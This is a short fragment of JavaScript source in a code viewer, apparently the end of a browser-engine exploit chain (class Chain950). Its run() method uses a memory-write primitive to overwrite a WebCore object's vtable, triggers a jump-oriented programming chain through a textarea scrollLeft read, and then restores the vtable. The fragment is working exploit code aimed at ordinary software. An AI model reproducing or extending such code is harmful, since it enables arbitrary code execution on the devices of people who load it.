()
| 333 | } |
| 334 | |
| 335 | run() { |
| 336 | this.check_stale(); |
| 337 | this.check_is_empty(); |
| 338 | this.check_is_branching(); |
| 339 | |
| 340 | // change vtable |
| 341 | this.webcore_ta.write64(0, get_view_vector(this.vtable)); |
| 342 | // jump to JOP chain |
| 343 | this.textarea.scrollLeft; |
| 344 | // restore vtable |
| 345 | this.webcore_ta.write64(0, this.old_vtable_p); |
| 346 | } |
| 347 | } |
| 348 | export const Chain = Chain950; |
| 349 |
nothing calls this directly
no test coverage detected